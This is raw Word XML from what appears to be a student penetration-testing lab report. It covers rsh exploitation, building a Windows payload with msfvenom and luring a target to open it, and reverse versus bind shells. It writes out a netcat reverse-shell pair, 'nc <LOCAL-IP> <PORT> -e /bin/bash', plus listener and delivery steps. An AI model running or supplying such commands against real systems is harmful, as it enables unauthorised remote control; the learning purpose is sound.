        <w:t xml:space="preserve">As usual I googled the name of this vulnerability, and I read that we need to use application called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> client instead of Metasploit. However, I do not have this application so let me install it first:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC305C1" w14:textId="6AC07D79" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="759A8C48" w14:textId="450493A0" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="5BA04980" w14:textId="2F308E50" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="74D07298" w14:textId="7BC921C2" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="6E210915" w14:textId="04666358" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="66FDCC0E" w14:textId="318A31EB" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="1DA9CF60" w14:textId="168568E6" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="1715FCEC" w14:textId="4194BA82" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="01C3DFBA" w14:textId="526A9585" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="5DF6FCF0" w14:textId="67526A10" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="5FBBD0B6" w14:textId="4342BB58" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="721A0804" w14:textId="6BB2749E" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="3830B248" w14:textId="3F3448C0" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="53D7CA5C" w14:textId="187B18BF" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="45710B63" w14:textId="1CCEB10E" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="406B22A1" w14:textId="77777777" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5"/>
    <w:p w14:paraId="4523C1EC" w14:textId="76401C94" w:rsidR="002238B5" w:rsidRDefault="002238B5" w:rsidP="002238B5">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002238B5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002238B5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002238B5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>rsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002238B5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>-client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14955879" w14:textId="3AC39D21" w:rsidR="002238B5" w:rsidRDefault="00374E3E" w:rsidP="002238B5">
      <w:r>
        <w:t>Then this command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6FC35E" w14:textId="30ECAB9A" w:rsidR="00374E3E" w:rsidRDefault="00374E3E" w:rsidP="002238B5">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0FE60776" w14:textId="2404B531" w:rsidR="00E648CF" w:rsidRDefault="00374E3E" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">As you can </w:t>
      </w:r>
      <w:r w:rsidR="00BF07AA">
        <w:t>see,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I have all control of the remote server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9304DB" w14:textId="29828886" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0FBC4BCF" w14:textId="707F9A36" w:rsidR="00BF07AA" w:rsidRDefault="00BF07AA" w:rsidP="00BF07AA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc115553366"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BB4E938" w14:textId="034BD6C6" w:rsidR="00BF07AA" w:rsidRDefault="00BF07AA" w:rsidP="00BF07AA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> helps us to generate payloads that we can use against several platforms like Unix, Nodejs, Android, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7B24C0" w14:textId="7986BE39" w:rsidR="002D2D5E" w:rsidRDefault="002D2D5E" w:rsidP="00BF07AA">
      <w:r>
        <w:t xml:space="preserve">Now I want to attack windows desktop that I use from Kali.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C298EE6" w14:textId="0253DD6C" w:rsidR="002D2D5E" w:rsidRDefault="002D2D5E" w:rsidP="00BF07AA">
      <w:r>
        <w:t>The code for generating a payload for windows is this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66623839" w14:textId="6FDA4896" w:rsidR="002D2D5E" w:rsidRPr="00BF07AA" w:rsidRDefault="002D2D5E" w:rsidP="00BF07AA">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="002D2D5E" w:rsidP="00B83FB4">
      <w:r>
        <w:t>This would save the malicious file in the Desktop of my kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B12CE" w14:textId="3F23CC39" w:rsidR="002D2D5E" w:rsidRDefault="002D2D5E" w:rsidP="00B83FB4">
      <w:r>
        <w:t>Now I need to send the file to my target which is windows and make them open the malicious file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E7EE5" w14:textId="53370F60" w:rsidR="00EA1CC4" w:rsidRDefault="00EA1CC4" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="0255BD35" w14:textId="2E4839E0" w:rsidR="00EA1CC4" w:rsidRDefault="00EA1CC4" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="23E112E2" w14:textId="77777777" w:rsidR="00EA1CC4" w:rsidRDefault="00EA1CC4" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="648909C4" w14:textId="5167592F" w:rsidR="002D2D5E" w:rsidRDefault="002D2D5E" w:rsidP="00B83FB4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>But first, let me listen to that specific port on my Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D54ADA" w14:textId="05A53A75" w:rsidR="00EA1CC4" w:rsidRDefault="00EA1CC4" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="2EC042E4" w14:textId="30E1BE46" w:rsidR="00EA1CC4" w:rsidRDefault="00EA1CC4" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="00EA1CC4" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="1A977302" w14:textId="72E7E36E" w:rsidR="00EA1CC4" w:rsidRDefault="00EA1CC4" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">Now I need to find a way to send the malicious file to the target. I will upload the malicious file to </w:t>
      </w:r>
      <w:r w:rsidRPr="005D08D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/var/www/html/</w:t>
      </w:r>
      <w:r w:rsidR="005D08D6" w:rsidRPr="005D08D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>viruses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450CF0D7" w14:textId="167135A0" w:rsidR="005D08D6" w:rsidRDefault="005D08D6" w:rsidP="00B83FB4">
      <w:r>
        <w:t>Then I would be able to access it from the target using the url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1022EE87" w14:textId="11F0EF0F" w:rsidR="005D08D6" w:rsidRDefault="00000000" w:rsidP="00B83FB4">
      <w:hyperlink r:id="rId144" w:history="1">
        <w:r w:rsidR="005D08D6" w:rsidRPr="00ED11F7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:highlight w:val="lightGray"/>
          </w:rPr>
          <w:t>http://LHOST/viruses</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73946B88" w14:textId="68117828" w:rsidR="005D08D6" w:rsidRDefault="005B55AF" w:rsidP="00B83FB4">
      <w:r>
        <w:t xml:space="preserve">After downloading it on the target machine, I just need to open it and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that is listening would gain all the access for the windows machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B8DF9" w14:textId="42AA1A0E" w:rsidR="005B55AF" w:rsidRDefault="005B55AF" w:rsidP="00B83FB4">
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="1FC51F71" w14:textId="6853E48D" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="7573DF65" w14:textId="13C4391E" w:rsidR="00E648CF" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CFE546" w14:textId="679BA32A" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="58CF824F" w14:textId="3F6524B0" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:t xml:space="preserve">Shells are what we use to interact with the command line environment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D4D07" w14:textId="3C5A3A83" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r w:rsidRPr="004E2155">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is when we force the target to connect to us.</w:t>
      </w:r>
      <w:r w:rsidR="006264C9">
        <w:t xml:space="preserve"> This methos is a good way to bypass firewalls. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EE43DB" w14:textId="49A0C220" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bind shell </w:t>
      </w:r>
      <w:r>
        <w:t>is when we connect to the target’s shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3744278F" w14:textId="28C65D18" w:rsidR="006264C9" w:rsidRDefault="006264C9" w:rsidP="004E2155">
      <w:r>
        <w:t>Here are some tools that are used for this vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE1D83" w14:textId="499EBEB7" w:rsidR="006264C9" w:rsidRDefault="006264C9" w:rsidP="006264C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A074772" w14:textId="0B803A4F" w:rsidR="006264C9" w:rsidRDefault="006264C9" w:rsidP="006264C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploit – multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5149A3AB" w14:textId="6C0AB881" w:rsidR="006264C9" w:rsidRDefault="006264C9" w:rsidP="006264C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72552E30" w14:textId="17B4AF37" w:rsidR="006264C9" w:rsidRDefault="006264C9" w:rsidP="006264C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09B29B3D" w14:textId="1A50EABD" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA"/>
    <w:p w14:paraId="2D4A0E6E" w14:textId="7CDE0D50" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2155">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799ED10B" w14:textId="71F52959" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA">
      <w:r>
        <w:t>On the attacking machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AAD608" w14:textId="2FA7FCE5" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;PORT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270EE8D8" w14:textId="68A9A883" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA">
      <w:r>
        <w:t>On the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB1B344" w14:textId="02076D35" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13FFA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;LOCAL-IP&gt; &lt;PORT&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56983E5E" w14:textId="77777777" w:rsidR="00D13FFA" w:rsidRDefault="00D13FFA" w:rsidP="00D13FFA"/>
    <w:p w14:paraId="69D003DC" w14:textId="77777777" w:rsidR="006264C9" w:rsidRPr="004E2155" w:rsidRDefault="006264C9" w:rsidP="006264C9"/>
    <w:p w14:paraId="42871C9A" w14:textId="54611331" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="2B2A1113" w14:textId="07DDCA51" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="62A732AE" w14:textId="43503253" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="76A77051" w14:textId="108CCF49" w:rsidR="00E648CF" w:rsidRDefault="00E648CF" w:rsidP="00B83FB4"/>
    <w:p w14:paraId="04F8E0BD" w14:textId="77777777" w:rsidR="00E648CF" w:rsidRDefault="00E648C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5DBBBDA7" w:rsidR="00A40D93" w:rsidRDefault="00A40D93" w:rsidP="00BD0697"/>
    <w:p w14:paraId="0667A4A3" w14:textId="71AFE48A" w:rsidR="0071361A" w:rsidRDefault="0071361A" w:rsidP="00BD0697"/>
    <w:p w14:paraId="03DF6B69" w14:textId="2D285690" w:rsidR="0071361A" w:rsidRDefault="0071361A" w:rsidP="00BD0697"/>
    <w:p w14:paraId="7F8DADB9" w14:textId="794E831F" w:rsidR="0071361A" w:rsidRDefault="0071361A" w:rsidP="00BD0697"/>
    <w:p w14:paraId="54093246" w14:textId="7FDA8490" w:rsidR="0071361A" w:rsidRDefault="0071361A" w:rsidP="00BD0697"/>
    <w:p w14:paraId="7D1C800B" w14:textId="49693063" w:rsidR="0071361A" w:rsidRDefault="0071361A" w:rsidP="00BD0697"/>
    <w:p w14:paraId="637232AF" w14:textId="2F0F52EB" w:rsidR="0071361A" w:rsidRDefault="0071361A" w:rsidP="00BD0697"/>
    <w:p w14:paraId="79ECD80F" w14:textId="0E29BDB9" w:rsidR="0071361A" w:rsidRDefault="0071361A" w:rsidP="00BD0697"/>
    <w:p w14:paraId="726028DD" w14:textId="77777777" w:rsidR="0071361A" w:rsidRPr="00BD0697" w:rsidRDefault="0071361A" w:rsidP="00BD0697"/>
    <w:p w14:paraId="08BD9A75" w14:textId="77777777" w:rsidR="00412D22" w:rsidRPr="009A5302" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>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54" w:name="_Toc115553367"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>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46"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47"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lastRenderedPageBreak/>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48"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49"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t>Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security Academy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. (n.d.). Retrieved September 21, 2022, from </w:t>
      </w:r>
      <w:hyperlink r:id="rId150"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3F00" w14:textId="77777777" w:rsidR="00A006DC" w:rsidRDefault="00A006DC" w:rsidP="00634C6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7BFDC5A0" w14:textId="77777777" w:rsidR="00A006DC" w:rsidRDefault="00A006DC"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1B70" w14:textId="77777777" w:rsidR="00A006DC" w:rsidRDefault="00A006DC" w:rsidP="00634C6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4173E2D3" w14:textId="77777777" w:rsidR="00A006DC" w:rsidRDefault="00A006DC"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8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1564438774">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="645158986">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1112478449">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1367681353">
    <w:abstractNumId w:val="19"/>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0"/>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4552"/>
    <w:rsid w:val="0012455C"/>
    <w:rsid w:val="00141090"/>
    <w:rsid w:val="001428C5"/>
    <w:rsid w:val="0015482D"/>
    <w:rsid w:val="001549F8"/>
    <w:rsid w:val="00155E9B"/>
    <w:rsid w:val="00163894"/>
    <w:rsid w:val="0016464D"/>
    <w:rsid w:val="00164FA7"/>
    <w:rsid w:val="0016765E"/>
    <w:rsid w:val="00182C69"/>
    <w:rsid w:val="00187809"/>
    <w:rsid w:val="001946D3"/>
    <w:rsid w:val="001C2206"/>
    <w:rsid w:val="001E1C59"/>
    <w:rsid w:val="001E5E2D"/>
    <w:rsid w:val="001F27F9"/>
    <w:rsid w:val="0021069F"/>
    <w:rsid w:val="00223824"/>
    <w:rsid w:val="002238B5"/>
    <w:rsid w:val="002275B2"/>
    <w:rsid w:val="002478A0"/>
    <w:rsid w:val="002512B5"/>
    <w:rsid w:val="00252732"/>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A6D48"/>
    <w:rsid w:val="003A7FDF"/>
    <w:rsid w:val="003B5C0B"/>
    <w:rsid w:val="003D14D0"/>
    <w:rsid w:val="003F6E5B"/>
    <w:rsid w:val="0041017F"/>
    <w:rsid w:val="00412D22"/>
    <w:rsid w:val="00421E7B"/>
    <w:rsid w:val="0045353E"/>
    <w:rsid w:val="004578CB"/>
    <w:rsid w:val="00467F20"/>
    <w:rsid w:val="00484919"/>
    <w:rsid w:val="004861BA"/>
    <w:rsid w:val="00490A30"/>
    <w:rsid w:val="004978C6"/>
    <w:rsid w:val="004A39E9"/>
    <w:rsid w:val="004A6BEC"/>
    <w:rsid w:val="004C3677"/>
    <w:rsid w:val="004C38BB"/>
    <w:rsid w:val="004C5424"/>
    <w:rsid w:val="004D2B19"/>
    <w:rsid w:val="004D7659"/>
    <w:rsid w:val="004E2155"/>
    <w:rsid w:val="004E4F8D"/>
    <w:rsid w:val="004E7C9A"/>
    <w:rsid w:val="004F4AF6"/>
    <w:rsid w:val="005023A7"/>
    <w:rsid w:val="005124E2"/>
    <w:rsid w:val="00516681"/>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452A"/>
    <w:rsid w:val="00634C6F"/>
    <w:rsid w:val="00635638"/>
    <w:rsid w:val="00661063"/>
    <w:rsid w:val="0066727E"/>
    <w:rsid w:val="00667FE8"/>
    <w:rsid w:val="006765E0"/>
    <w:rsid w:val="00683E25"/>
    <w:rsid w:val="0068665A"/>
    <w:rsid w:val="006921D2"/>
    <w:rsid w:val="00693CC2"/>
    <w:rsid w:val="006B21C7"/>
    <w:rsid w:val="006B4B28"/>
    <w:rsid w:val="006B598E"/>
    <w:rsid w:val="006B6DB3"/>
    <w:rsid w:val="006C3E5D"/>
    <w:rsid w:val="006D2153"/>
    <w:rsid w:val="006D41D6"/>
    <w:rsid w:val="006D7616"/>
    <w:rsid w:val="006E0449"/>
    <w:rsid w:val="006F531D"/>
    <w:rsid w:val="00702A15"/>
    <w:rsid w:val="0071361A"/>
    <w:rsid w:val="007220F1"/>
    <w:rsid w:val="00726408"/>
    <w:rsid w:val="007340EA"/>
    <w:rsid w:val="007512F8"/>
    <w:rsid w:val="007531C6"/>
    <w:rsid w:val="00772DFA"/>
    <w:rsid w:val="00773220"/>
    <w:rsid w:val="00782BA9"/>
    <w:rsid w:val="00786AE6"/>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359B7"/>
    <w:rsid w:val="008420E6"/>
    <w:rsid w:val="00846024"/>
    <w:rsid w:val="00860960"/>
    <w:rsid w:val="008626F8"/>
    <w:rsid w:val="008634D0"/>
    <w:rsid w:val="008707FC"/>
    <w:rsid w:val="0087543D"/>
    <w:rsid w:val="00881CA3"/>
    <w:rsid w:val="00894976"/>
    <w:rsid w:val="008A6BDF"/>
    <w:rsid w:val="008B0563"/>
    <w:rsid w:val="008B2DEC"/>
    <w:rsid w:val="008B50C8"/>
    <w:rsid w:val="008D075F"/>
    <w:rsid w:val="008E1B51"/>
    <w:rsid w:val="008E501B"/>
    <w:rsid w:val="008F1777"/>
    <w:rsid w:val="008F4E24"/>
    <w:rsid w:val="009107C8"/>
    <w:rsid w:val="009208B5"/>
    <w:rsid w:val="00922CAF"/>
    <w:rsid w:val="00926F5F"/>
    <w:rsid w:val="00947003"/>
    <w:rsid w:val="0094742F"/>
    <w:rsid w:val="0095033A"/>
    <w:rsid w:val="009634F7"/>
    <w:rsid w:val="00973AB0"/>
    <w:rsid w:val="009903D8"/>
    <w:rsid w:val="009933D5"/>
    <w:rsid w:val="00996A0E"/>
    <w:rsid w:val="009A5302"/>
    <w:rsid w:val="009C517E"/>
    <w:rsid w:val="009C6349"/>
    <w:rsid w:val="009D132A"/>
    <w:rsid w:val="009D6DD5"/>
    <w:rsid w:val="009E072A"/>
    <w:rsid w:val="00A006DC"/>
    <w:rsid w:val="00A04E1F"/>
    <w:rsid w:val="00A07D28"/>
    <w:rsid w:val="00A15DF8"/>
    <w:rsid w:val="00A40D93"/>
    <w:rsid w:val="00A41477"/>
    <w:rsid w:val="00A43ABC"/>
    <w:rsid w:val="00A447F1"/>
    <w:rsid w:val="00A47AD3"/>
    <w:rsid w:val="00A53A03"/>
    <w:rsid w:val="00A6748B"/>
    <w:rsid w:val="00A73FE2"/>
    <w:rsid w:val="00AB1127"/>
    <w:rsid w:val="00AB52F3"/>
    <w:rsid w:val="00AB5F19"/>
    <w:rsid w:val="00AC2210"/>
    <w:rsid w:val="00AE2795"/>
    <w:rsid w:val="00AE58E2"/>
    <w:rsid w:val="00B05ED2"/>
    <w:rsid w:val="00B0687C"/>
    <w:rsid w:val="00B16C30"/>
    <w:rsid w:val="00B2488F"/>
    <w:rsid w:val="00B343FF"/>
    <w:rsid w:val="00B4057B"/>
    <w:rsid w:val="00B44618"/>
    <w:rsid w:val="00B52B60"/>
    <w:rsid w:val="00B532A1"/>
    <w:rsid w:val="00B548A8"/>
    <w:rsid w:val="00B656EA"/>
    <w:rsid w:val="00B763FF"/>
    <w:rsid w:val="00B81261"/>
    <w:rsid w:val="00B83FB4"/>
    <w:rsid w:val="00BA0779"/>
    <w:rsid w:val="00BA0EEB"/>
    <w:rsid w:val="00BA3ABD"/>
    <w:rsid w:val="00BA559D"/>
    <w:rsid w:val="00BA796E"/>
    <w:rsid w:val="00BD0697"/>
    <w:rsid w:val="00BF07AA"/>
    <w:rsid w:val="00BF44AE"/>
    <w:rsid w:val="00C075DB"/>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15EB"/>
    <w:rsid w:val="00CF2415"/>
    <w:rsid w:val="00CF739A"/>
    <w:rsid w:val="00D0186C"/>
    <w:rsid w:val="00D13FFA"/>
    <w:rsid w:val="00D14341"/>
    <w:rsid w:val="00D227BE"/>
    <w:rsid w:val="00D33C0B"/>
    <w:rsid w:val="00D34D40"/>
    <w:rsid w:val="00D45A07"/>
    <w:rsid w:val="00D537C6"/>
    <w:rsid w:val="00D56067"/>
    <w:rsid w:val="00D7708B"/>
    <w:rsid w:val="00D82EBD"/>
    <w:rsid w:val="00D95D5E"/>
    <w:rsid w:val="00DA34CB"/>
    <w:rsid w:val="00DB007A"/>
    <w:rsid w:val="00DC7B4B"/>
    <w:rsid w:val="00DD0692"/>
    <w:rsid w:val="00DD3B43"/>
    <w:rsid w:val="00DD7EE9"/>
    <w:rsid w:val="00DE2C41"/>
    <w:rsid w:val="00E03BA4"/>
    <w:rsid w:val="00E06B08"/>
    <w:rsid w:val="00E13E2E"/>
    <w:rsid w:val="00E26FC0"/>
    <w:rsid w:val="00E456C1"/>
    <w:rsid w:val="00E459AB"/>
    <w:rsid w:val="00E51021"/>
    <w:rsid w:val="00E53E5C"/>
    <w:rsid w:val="00E648CF"/>
    <w:rsid w:val="00E67820"/>
    <w:rsid w:val="00E86C6E"/>
    <w:rsid w:val="00EA1CC4"/>
    <w:rsid w:val="00EA41A4"/>
    <w:rsid w:val="00EB31A3"/>
    <w:rsid w:val="00EB777E"/>
